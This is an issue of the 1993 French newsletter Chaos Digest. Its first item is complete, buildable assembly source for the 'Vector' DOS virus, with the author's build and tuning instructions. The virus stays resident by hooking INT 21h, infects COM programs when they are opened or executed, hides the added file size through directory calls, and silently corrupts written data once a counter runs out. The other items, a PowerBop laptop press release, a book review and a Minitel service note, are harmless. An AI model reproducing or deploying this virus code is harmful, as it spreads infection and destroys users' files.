Chaos Digest Lundi 7 Juin 1993 Volume 1 : Numero 45 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.45 (7 Juin 1993) File 1--Le virus Vector (essai d'ecriture) File 2--PowerBop, le portable Apple communicant sans fils (technique) File 3--Critique de _Computer Virus Handbook_ de Highland (livre) File 4--L'annuaire electronique [11] en langues etrangeres (acces) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Wed, 2 Jun 1993 14:03:46 +0100 (WET DST) From: NTH@altern.com (Necros the Hacker ) Subject: File 1--Le virus Vector (essai d'ecriture) The Vector Virus by Necros the Hacker This is a fairly simple virus I wrote a while back. However, for its size it has some nice features, including * memory resident in the interrupt vector table; * hides file size increases; * infects COM programs on opening or execution; * small and subtle, but nasty, damage routine. The main aim of the virus was to write something small and well-coded. At 376 bytes it's not tiny but it's small enough to fit into the interrupt vector table. The side effects of placing the virus in the interrupt table are that it may conflict with other programs which use the interrupts, but more importantly it can go resident without users noticing a decrease in system memory. Ok, so that's the idea behind it. Now what does it do? Well, it's resident in memory and infects COM programs when they're opened or executed. Notice that's COM *programs*, not just files. It checks to see if the file is actually a COM program with an EXE extension too. The virus has a timer which counts up to 0FFFh & when this number of writes takes place in DOS with the virus resident, it performs its damage. The damage is simply to chnage the data that was written subtly --- a byte is dropped from the start of the written block & appened to the end. So there's no change in size of the file that was written. For EXE programs or archive programs or backup programs this sort of error can ruin the whole file. At least it makes the job of recovering the undamaged data from the damaged stuff very difficult. The virus also hides file size increases. Each infected file has its date increased by a century, so it won't appear as being different in listings. Only FCB calls are intercepted & massaged into subtracting the virus' length. I couldn't be bothered to do it for handle calls cos FCBs are used in the DOS dir command. Anyway, I present this code more as a demonstration of how to do some common things efficiently. I'm mainly interested in writing good code, so if anyone's got any suggestions on how to make it better, you can comment here if the list maintainer is in agreement. Oh, one last thing. The assembler code is turned into a COM program using tasm & tlink. The resultant program is actually an infector of a program called test.com. Just create a simple 3-byte program & then run vector.com which will infect the test program. There's a message at the end of the virus which can be removed if you want. Don't just overwrite it with your own. Removing it is a matter of moving the line just after message db . . . to just before it. Another thing you might want to modify is the damage timer . . . change 0fffh in the code to some other value. I'll leave you figure out what to change it to yourself. It shouldn't be too dificult :) Have fun, NTH --------------------------------------------------------------------------- ;VECTOR.ASM Written by Necros the Hacker 12 Aug 1991 ;TSR virus which resides in interrupt table model tiny code org 100h ;makes no difference - relocatable start: jmp shell ;the non-resident part of the virus ;the three previous bytes are overwritten with host's first bytes org 103h repair: mov si,[ds:101h] ;find offset of virus from 100h mov di,100h ;place to write original file bytes push di add si,di ;si is now start of virus cld movsb movsw ;restore start of host push es xor bx,bx ;suitably unused register mov es,bx mov cx,[es:0084h] ;offset of int 21 handler mov dx,[es:0086h] ;segment of int 21 handler push ax mov ax,4bf1h int 21h mov di,ax pop ax cmp di,0abc0h ;signature jz restart_host ;already installed sub si,3 ;point to start of virus again ;code to make resident and hook vectors ;first save the old vector (in this copy) mov (old_int_21-100h)[si],cx mov (old_int_21-0feh)[si],dx ;now make the copy! mov di,07bh*4 mov cx,virus_length rep movsb ;now hook the vector proper cli mov [es:0084h],offset handler_offset mov [es:0086h],cx sti ;and fall through to restart the host restart_host: pop es ret ;start host (note AX unchanged by virus) jump_buf_offset equ $-100h+07bh*4 jump_buf db 0e9h,0,0 ;jump to replace start of host modify_dir proc near pushf call dword ptr cs:chain_offset cmp al,0ffh je ret_error push es push bx push ax mov ah,2fh int 21h cmp byte ptr es:[bx],0ffh ;is extended FCB? jne not_extended add bx,7 not_extended: cmp byte ptr es:[bx+1ah],51 ;year>2105 AD? jbe no_mods sub word ptr es:[bx+1dh],virus_length no_mods: pop ax pop bx pop es ret_error: iret modify_dir endp ;new int 21 handler even ;although the virus is relocatable, it will ;always be on an even address when resident chain_offset equ $-100h+07bh*4 ;alsolute address to chain to old_int_21 dw 0,0 handler_offset equ $-100h+07bh*4 new_handler proc cmp ax,4bf1h ;residency request jne is_dir mov ax,0abc0h iret is_dir: cmp ah,11h je modify_dir cmp ah,12h je modify_dir cmp ah,40h ;write? jne is_open cmp bl,3 ;don't affect stdout/stderr/stdin jb damage_ok inc dx ;perform damage dec word ptr cs:[offset counter_offset] jz damage_ok dec dx ;not time for damage, so undo it damage_ok: and word ptr cs:[offset counter_offset],0fffh jmp normal_handler is_open: cmp ah,3dh ;open file (read only) jne is_exec ;infect only COM (or EXE) files when opened push ax push si mov si,dx cld find_extension: lodsb or al,al je no_infect cmp al,'.' ;look for the extension jne find_extension ;OK now check to see if the extension is COM or EXE lodsb or al,20h cmp al,'c' jne try_exe lodsw or ax,2020h cmp ax,'mo' jne no_infect je eligible try_exe: lodsw or ax,2020h cmp ax,'ex' jne no_infect eligible: pop si pop ax jmp infect_file no_infect: pop si pop ax jmp normal_handler is_exec: cmp ax,4b00h ;EXEC? jne normal_handler infect_file: ;code to infect the file push ax push bx push cx push dx push ds ;open the file for infecting mov ax,3d02h xor cx,cx pushf call dword ptr cs:chain_offset jc restore_regs mov bx,ax push cs pop ds mov ah,3fh ;read from handle mov cx,3 ;first three bytes mov dx,07bh*4h ;to start of virus (jumped over) int 21h jc no_date_set ;only small files cmp ds:[07bh*4],'ZM' ;EXE file? je no_date_set mov ax,5700h ;get time and date stamp int 21h push cx push dx cmp dh,51 ;year>=2005 (1980+25+1 from month) ja close_file pop dx add dh,200 ;gives same year in next century push dx ;will be set before closing mov ax,4202h ;LSEEK to end of file xor cx,cx xor dx,dx int 21h mov word ptr offset jump_buf_offset+1,ax ;save length of host ;while we're here, append the virus mov ah,40h mov cx,virus_length mov dx,07bh*4 int 21h jc close_file mov ax,4200h ;LSEEK to start of file xor cx,cx xor dx,dx int 21h mov ah,40h ;write with handle mov cx,3 mov dx,offset jump_buf_offset int 21h close_file: pop dx pop cx mov ax,5701h ;reset time and date int 21h no_date_set: mov ah,3eh int 21h restore_regs: pop ds pop dx pop cx pop bx pop ax normal_handler: ;either open or EXEC jmp dword ptr cs:chain_offset new_handler endp counter_offset equ $-100h+07bh*4 counter dw 0 ;when counter reaches zero, byte is "lost" message db 'V3.0 [VECTOR] (c) Necros the Hacker',10,13 db 'Written Aug 1991 in Tralee, Ireland',10,13 virus_length equ $-start shell: ;open the file for infecting mov ax,3d02h xor cx,cx mov dx,offset filename int 21h jc shell_error mov bx,ax mov ah,3fh ;read from handle mov cx,3 ;first three bytes mov dx,0100h ;to start of virus (jumped over) int 21h jc shell_error mov ax,4202h ;LSEEK to end of file xor cx,cx xor dx,dx int 21h mov word ptr jump_buf+1,ax ;save length of host ;while we're here, append the virus mov ah,40h mov cx,virus_length mov dx,0100h int 21h jc shell_error mov ax,4200h ;LSEEK to start of file xor cx,cx xor dx,dx int 21h mov ah,40h ;write with handle mov cx,3 mov dx,offset jump_buf int 21h mov ah,3eh int 21h exit_stub: mov ax,4c00h int 21h shell_error: mov ah,9 mov dx,offset err$ int 21h jmp exit_stub err$ db 'Error infecting file',10,13,'$' filename db 'test.com',0 end start ------------------------------ Date: Fri Jun 4 12:07:00 -0600 1993 From: cccf@email.teaser.com (cccf ) Subject: File 2--PowerBop, le portable Apple communicant sans fils (technique) Apple European R&D extends mobile computing with wireless communications Paris La Defense, June 4, 1993--With PowerBop, the first notebook integrating cordless communications technology, recently launched in France, Apple European R&D extands mobile computing and enhances communications capabilities. PowerBop, the newest model of the popular PowerBook series, offers the highest degree of autonomy on the notebook computer market today. The ongoing technical cooperation between Apple European R&D Centre based in Paris, and France Telecom, the French PTO operator resulted in the integration of radio capabilities with notebook computers making it possible to connect them to Telepoint services. Telepoint is expanding more and more in Europe and uses the most affordable wireless technology available today. Apple European R&D focuses primarily on modems, on telecommunications in mobile computers and on products that comply with OSI (Open System Inter- connection) standards. PowerBop: A new dimension in communications freedom +--------------------------------------------------- PowerBop brings notebook users an added dimension of freedom, above and beyond the inherent benefits of Apple's popular PowerBook models. The PowerBop contains a radio modem conform to the CT2 Telepoint standard in accordance with the Common Air Interface (CAI), adopted in June 1991 on an European level. The CT2 standard allows a new generation of personal telephones. Their owners are able to use them in public places in large cities, at home as a traditional cordless phone and in the office via PBX extensions. Within the PowerBop, the radio modem CT2 provides the ability to connect it to a full range of communications services, at any time, from any place that is located between 20 and 500 meters from the base station of the Pointel network "Bi-Bop", launched by France Telecom in Paris and Strasbourg on April 22,1993. These services include: access to the France Telecom videotex service "Minitel", message and file exchange, fax transmission, access to servers and databases. Thanks to the low energy consumption of the CT2 technology, the PowerBop retains its 1 - 1/2 to 2 hours of endurance when the wireless modem is being used. The PowerBop features all the advantages of the PowerBook 180, Apple's high-end notebook. The internal floppy disk drive is replaced by the CT2 modem which means that users do not need to carry any additional equipment to communicate via the telepoint network. An external floppy disk drive is supplied as a standard accessory. Like the Bi-Bop pocket phone designed and developped by France Telecom, the Apple PowerBop has a small antenna which folds into a special slot. The Express Modem provided as standard equipment inside the PowerBop, offers a full range of communications functions: * access to one of the 15,000 Minitel services; * fax transmision (reception will be available on the French network from Septembre 1993); * data transmission from 300 to 14,400 bps. The Express Modem can either be connected directly to a telephone line or use the Bi-Bop network for wireless communications up to 9,600 bps. Digital Cordless Market +----------------------- European operators view telepoint as a mass market application for wireless telephones. At the present time, no European country offers a nationwide commercial telepoint service. However there are currently a number of networks of this type spreading out. Mainly, in the UK, Netherlands, Finland and Belgium. In other parts of the world, others such developments are under way, in Asia, Australia, Canada and the United-States. On the sales side, it appears that all the operators have a common desire to implement a pricing structure to allow this technology to be affordable for a consumer market. France Telecom's new Bi-Bop service +----------------------------------- France Telecom took a leading role in the development of European telepoint services. On April 22, France Telecom launched the Bi-Bop cordless digital pocket phone in Paris. The system which employs the CT2 cordless standard, sets up a digital radio link between the Bi-Bop terminal and a public or home base station. The Bi-Bop service covers three main types of use: * Public use: Bi-Bop subsribers can call anywhere in the world from major cities, starting with Paris and Strasbourg. The network is designed to cover major thoroughfares and public places. Today, some 3,000 base stations (4,000 by fall 1993) span Paris and the greater Paris area (Ile-de-France) and the network will be progressively extended to other areas. Starting in September 1993, subscribers will also be able to receive calls, and PowerBop notebook users will have fax reception capacities; * With a private home base station connected to a standard telephone outlet, the PowerBop is transformed into a high-performance mobile computing tool allowing one to access all private communications services; * Wireless PBXs are available to companies, allowing PowerBop users anywhere at a site, for example, to benefit from the same computing environment as if the user was at his desk. The PowerBop can also become a mobile fax terminal. Availability +------------ The PowerBop will be available through certified Apple Computer France distributors in June 1993. PowerBop owners must have a special telephone subscription with France Telecom. Nota Bene +--------- At this time, I am in a luxurous cafe on the Champs-Elysees in Paris in holidays and I send this note to ChaosD with my PowerBop... without any problem... ------------------------------ Date: Fri Jun 4 12:07:00 -0600 1993 From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep ) Subject: File 3--Critique de _Computer Virus Handbook_ de Highland (livre) Copyright: Robert M. Slade, 1993 Elsevier Mayfield House 256 Banbury Road Oxford OX2 7DH England 655 Avenue of the Americas New York, NY 10010 USA 212-989-5800 fax: 212-633-3990 Computer Virus Handbook, Harold Joseph Highland 1990, 0-946395-46-2 When Dr. Highland first offered to send me a copy of this work, late in 1992, he indicated that it was outdated. In some respects this is true. Some of the precautions suggested in a few of the essays which Dr. Highland did not write tend to sound quaint. As one example, with the advantage of hindsight, Jon David's ten page antiviral review checklist contains items of little use, and has a number of important gaps. However, for the "general", rather than "specialist" audience, this work has much to recommend it. The coverage is both broad and practical, and the information, although not quite up to date, is complete and accurate as far as it goes. The book starts with, as the title has it, "Basic Definitions and Other Fundamentals". Dr. Highland has collected definitions from a number of sources here, which makes a refreshing change from some of the dogmatic assertions in other works. The fact that the reader is left to make his own final decision as to a working definition might be frustrating to some, but is likely reasonable given that the argument over the definition of a virus is still raging to this day. With the changes that are still taking place in terms of new "forms" of viral programs, it is unlikely that this debate will be settled any time soon. Chapter one also contains important background information on the operation of the PC and the structure of MS-DOS format disks. The one shortcoming might be that so much of the book deals with MS-DOS machines that readers dealing with other systems may fail to note the generic concepts contained therein. Chapter two is a concise but encompassing overview of the viral situation by William Hugh Murray. Using epidemiology as a model, he covers the broad outline of viral functions within a computing "environment", and examines some theoretical guidelines to direct the building of policy and procedures for prevention of viral infection. The article is broadly helpful without ever pushing the relation between computer viral and human epidemiology too far. Chapter three deals with history and examples of specific viral programs. This section is an extremely valuable resource. While other works reviewed have contained similar sections, the quality of this segment in Highland's tome is impressive. Mention must be made of the reports by Bill Kenny of Digital Dispatch who provides detailed and accurate descriptions of the operations of a number of viral programs which are, unfortunately, all still too common. (Chapter four is similar, containing three reports of viral programs from other sources.) Large sections of the handbook deal with the evaluation and review of antiviral software. (I must say that I had great sympathy with that part of the preface which dealt with some experiences encountered when trying to test various packages.) Chapter five gives an evaluation protocol and test methodology. The detail here may lead some to skip over it, but it is helpful to those who wish to determine how thoroughly the testing was conducted. Chapter six, an article by Jon David as mentioned earlier, is a suggested procedure and checklist for testing antiviral software. This chapter is unfortunately weak, and although there is some valuable direction, one comes away with the impression that the important thing to test is whether the program runs on a VGA monitor and has a bound manual. One must, of course, realize that antiviral testing was then in its infancy, and Mr. David's article reflects the general tone fo those times. Chapter seven is concerned with specific product evaluations, and, as most lists of its type do, shows its age. Of the twenty products listed, I recognize only seven as still being in existence,; of those that still do exist four have changed substantially in the intervening three years. Chapter eight is an essay by Harry de Maio entitled "Viruses - A Management Issue", and it must be considered one of the "forgotten gems" of virus literature. It debunks a number of myths, and raises a number of issues seldom discussed in corporate security and virus management. Chapter nine is similar, being Dr. Highland's suggested procedures for reducing the risk of computer virus infection. Chapter ten is a collection of essays on theoretical aspects of computer virus research and defence. Fred Cohen is heavily represented here, of course, but not as singularly as in, for example, Hoffman's "Rogue Programs". Dated as the book may be in some respects, it is still a valuable overview for those wishing to study viral programs or the defence against them, particularly in a corporate environment. While some may find the book to be "academic" in tone, it never launches into "blue sky" speculations: all of the material here is realistic. The "aging" of the product reviews makes it difficult to consider it still a reference "handbook" or a "how to" resource, but Dr. Highland's work is by no means to be discarded yet. +++++++++++++++ Vancouver ROBERTS@decus.ca | "Do you get guns with your Institute for Robert_Slade@sfu.ca | gun magazines? No. Research into rslade@cue.bc.ca | Do you get viruses with your User p1@CyberStore.ca | virus magazines? Yes." Security Canada V7K 2G6 | - Kevin Marcus ------------------------------ Date: 03 Jun 93 23:59:59 GMT From: jbcondat@attmail.com (Jean-Bernard Condat ) Subject: File 4--L'annuaire electronique [11] en langues etrangeres (acces) Repost from: telecom3.373.2@eecs.nwu.edu Since the beginning of February, the French "Annuaire Electronique" is available in Italian language. You can access it, from France, by dialing 3614 code RAE, and from other countries, by MinitelNet or by a telephone line: +33 36 43 14 14 code RAE (Ricerca Annuario Elettronico). +----------------------------------------+ | *R*icerca | | *A*nnuario | | *E*lettronico | | | | 1 Ricerca di un abbonato | | | | 2 LA POSTA : codice di | | avviamento postale | | | | 3 Sapere tutto sull'elenco | | elettronico | | | | 4 Sapere tutto sul minitel | | | | 5 L'elenco elettronico | | e teletel dall'estero | | | |----------------------------------------| | N! scelto: ... poi Invio | | (C) France Telecom 1992 | +----------------------------------------+ For all versions, all diagnostics, instructions and list of professionnals are translate into the appropriate language. Five different options are available: "Search for a subscriber", "The Post Office: Postal Code", "All you need to know about the Electronic Directory", "All you need to know about the Minitel", "Electronic Directory and Teletel from abroad". Called the "11" in France, this service is already available in: * English: 3614 code ED [Electronic Directory]; * Spanish: 3614 code GTE [Guidia Telefonica Electronia]; * German : 3614 code ETB [Elektronisches Telefonbuch]. ------------------------------ End of Chaos Digest #1.45 ************************************